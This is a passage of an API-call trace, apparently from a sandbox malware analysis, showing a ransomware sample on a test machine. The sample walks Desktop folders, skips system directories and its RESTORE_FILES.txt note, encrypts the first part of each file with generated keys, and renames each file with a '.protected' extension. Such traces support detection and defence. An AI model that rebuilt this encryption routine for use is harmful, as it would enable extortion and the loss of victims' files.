CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4cnsrlzcwij.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.157] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp") returned 57 [0091.157] StrStrW (lpFirst="4CnSrLzCWij.bmp", lpSrch=".txt") returned 0x0 [0091.157] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp") returned 57 [0091.157] StrStrW (lpFirst="4CnSrLzCWij.bmp", lpSrch=".rar") returned 0x0 [0091.157] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp") returned 57 [0091.157] StrStrW (lpFirst="4CnSrLzCWij.bmp", lpSrch=".zip") returned 0x0 [0091.157] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.158] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.158] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.158] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.158] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.158] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.158] CloseHandle (hObject=0xb4) returned 1 [0091.159] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp.protected") returned 67 [0091.159] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4cnsrlzcwij.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4cnsrlzcwij.bmp.protected")) returned 1 [0091.159] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.159] lstrcmpiW (lpString1="7gYc1.rtf", lpString2="Windows") returned -1 [0091.159] lstrcmpiW (lpString1="7gYc1.rtf", lpString2="Program Files") returned -1 [0091.159] lstrcmpiW (lpString1="7gYc1.rtf", lpString2="Program Files (x86)") returned -1 [0091.160] lstrcmpiW (lpString1="7gYc1.rtf", lpString2="$Recycle.bin") returned 1 [0091.160] lstrcmpiW (lpString1="7gYc1.rtf", lpString2="System Volume Information") returned -1 [0091.160] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf") returned 51 [0091.160] StrStrIW (lpFirst="7gYc1.rtf", lpSrch=".protected") returned 0x0 [0091.160] lstrcmpW (lpString1="7gYc1.rtf", lpString2="RESTORE_FILES.txt") returned -1 [0091.160] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.160] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7gyc1.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.160] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf") returned 51 [0091.160] StrStrW (lpFirst="7gYc1.rtf", lpSrch=".txt") returned 0x0 [0091.160] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf") returned 51 [0091.160] StrStrW (lpFirst="7gYc1.rtf", lpSrch=".rar") returned 0x0 [0091.160] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf") returned 51 [0091.160] StrStrW (lpFirst="7gYc1.rtf", lpSrch=".zip") returned 0x0 [0091.160] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.161] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.161] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.161] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.161] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.161] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.161] CloseHandle (hObject=0xb4) returned 1 [0091.162] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf.protected") returned 61 [0091.162] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7gyc1.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7gYc1.rtf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7gyc1.rtf.protected")) returned 1 [0091.162] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.162] lstrcmpiW (lpString1="7YQ_vFv", lpString2="Windows") returned -1 [0091.162] lstrcmpiW (lpString1="7YQ_vFv", lpString2="Program Files") returned -1 [0091.162] lstrcmpiW (lpString1="7YQ_vFv", lpString2="Program Files (x86)") returned -1 [0091.162] lstrcmpiW (lpString1="7YQ_vFv", lpString2="$Recycle.bin") returned 1 [0091.162] lstrcmpiW (lpString1="7YQ_vFv", lpString2="System Volume Information") returned -1 [0091.163] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv") returned 49 [0091.163] lstrcmpW (lpString1="7YQ_vFv", lpString2=".") returned 1 [0091.163] lstrcmpW (lpString1="7YQ_vFv", lpString2="..") returned 1 [0091.163] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\*") returned 51 [0091.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.163] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.163] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.163] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.163] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.163] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.163] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\.") returned 51 [0091.163] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.163] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.163] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.163] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.163] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.163] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.163] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.163] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\..") returned 52 [0091.163] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.163] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.163] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.163] lstrcmpiW (lpString1="I-nVNcxpkWGgDJb.ods", lpString2="Windows") returned -1 [0091.163] lstrcmpiW (lpString1="I-nVNcxpkWGgDJb.ods", lpString2="Program Files") returned -1 [0091.163] lstrcmpiW (lpString1="I-nVNcxpkWGgDJb.ods", lpString2="Program Files (x86)") returned -1 [0091.163] lstrcmpiW (lpString1="I-nVNcxpkWGgDJb.ods", lpString2="$Recycle.bin") returned 1 [0091.163] lstrcmpiW (lpString1="I-nVNcxpkWGgDJb.ods", lpString2="System Volume Information") returned -1 [0091.163] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods") returned 69 [0091.163] StrStrIW (lpFirst="I-nVNcxpkWGgDJb.ods", lpSrch=".protected") returned 0x0 [0091.163] lstrcmpW (lpString1="I-nVNcxpkWGgDJb.ods", lpString2="RESTORE_FILES.txt") returned -1 [0091.163] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.163] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\i-nvncxpkwggdjb.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.164] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods") returned 69 [0091.164] StrStrW (lpFirst="I-nVNcxpkWGgDJb.ods", lpSrch=".txt") returned 0x0 [0091.164] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods") returned 69 [0091.164] StrStrW (lpFirst="I-nVNcxpkWGgDJb.ods", lpSrch=".rar") returned 0x0 [0091.164] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods") returned 69 [0091.164] StrStrW (lpFirst="I-nVNcxpkWGgDJb.ods", lpSrch=".zip") returned 0x0 [0091.164] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.165] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.165] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.165] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.165] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.165] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.165] CloseHandle (hObject=0xd4) returned 1 [0091.166] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods.protected") returned 79 [0091.166] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\i-nvncxpkwggdjb.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\I-nVNcxpkWGgDJb.ods.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\i-nvncxpkwggdjb.ods.protected")) returned 1 [0091.166] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.166] lstrcmpiW (lpString1="mxcky74GMvvBNcJLcV.pps", lpString2="Windows") returned -1 [0091.166] lstrcmpiW (lpString1="mxcky74GMvvBNcJLcV.pps", lpString2="Program Files") returned -1 [0091.167] lstrcmpiW (lpString1="mxcky74GMvvBNcJLcV.pps", lpString2="Program Files (x86)") returned -1 [0091.167] lstrcmpiW (lpString1="mxcky74GMvvBNcJLcV.pps", lpString2="$Recycle.bin") returned 1 [0091.167] lstrcmpiW (lpString1="mxcky74GMvvBNcJLcV.pps", lpString2="System Volume Information") returned -1 [0091.167] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps") returned 72 [0091.167] StrStrIW (lpFirst="mxcky74GMvvBNcJLcV.pps", lpSrch=".protected") returned 0x0 [0091.167] lstrcmpW (lpString1="mxcky74GMvvBNcJLcV.pps", lpString2="RESTORE_FILES.txt") returned -1 [0091.167] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.167] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\mxcky74gmvvbncjlcv.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps") returned 72 [0091.167] StrStrW (lpFirst="mxcky74GMvvBNcJLcV.pps", lpSrch=".txt") returned 0x0 [0091.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps") returned 72 [0091.167] StrStrW (lpFirst="mxcky74GMvvBNcJLcV.pps", lpSrch=".rar") returned 0x0 [0091.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps") returned 72 [0091.167] StrStrW (lpFirst="mxcky74GMvvBNcJLcV.pps", lpSrch=".zip") returned 0x0 [0091.167] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.168] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.168] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.169] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.169] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.169] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.169] CloseHandle (hObject=0xd4) returned 1 [0091.170] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps.protected") returned 82 [0091.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\mxcky74gmvvbncjlcv.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\mxcky74gmvvbncjlcv.pps.protected")) returned 1 [0091.171] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.171] lstrcmpiW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2="Windows") returned -1 [0091.171] lstrcmpiW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2="Program Files") returned -1 [0091.171] lstrcmpiW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2="Program Files (x86)") returned -1 [0091.171] lstrcmpiW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2="$Recycle.bin") returned 1 [0091.171] lstrcmpiW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2="System Volume Information") returned -1 [0091.171] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ") returned 70 [0091.171] lstrcmpW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2=".") returned 1 [0091.171] lstrcmpW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2="..") returned 1 [0091.171] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\*") returned 72 [0091.171] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0091.171] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.171] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.171] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.171] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.171] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.171] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\.") returned 72 [0091.171] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.171] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.171] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.171] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.171] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.171] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.172] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.172] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\..") returned 73 [0091.172] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.172] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.172] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.172] lstrcmpiW (lpString1="5-oyH08kP_LNgi9EejZa.swf", lpString2="Windows") returned -1 [0091.172] lstrcmpiW (lpString1="5-oyH08kP_LNgi9EejZa.swf", lpString2="Program Files") returned -1 [0091.172] lstrcmpiW (lpString1="5-oyH08kP_LNgi9EejZa.swf", lpString2="Program Files (x86)") returned -1 [0091.172] lstrcmpiW (lpString1="5-oyH08kP_LNgi9EejZa.swf", lpString2="$Recycle.bin") returned 1 [0091.172] lstrcmpiW (lpString1="5-oyH08kP_LNgi9EejZa.swf", lpString2="System Volume Information") returned -1 [0091.172] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf") returned 95 [0091.172] StrStrIW (lpFirst="5-oyH08kP_LNgi9EejZa.swf", lpSrch=".protected") returned 0x0 [0091.172] lstrcmpW (lpString1="5-oyH08kP_LNgi9EejZa.swf", lpString2="RESTORE_FILES.txt") returned -1 [0091.172] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0091.172] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0091.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\5-oyh08kp_lngi9eejza.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0091.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf") returned 95 [0091.172] StrStrW (lpFirst="5-oyH08kP_LNgi9EejZa.swf", lpSrch=".txt") returned 0x0 [0091.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf") returned 95 [0091.172] StrStrW (lpFirst="5-oyH08kP_LNgi9EejZa.swf", lpSrch=".rar") returned 0x0 [0091.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf") returned 95 [0091.172] StrStrW (lpFirst="5-oyH08kP_LNgi9EejZa.swf", lpSrch=".zip") returned 0x0 [0091.172] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.173] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, 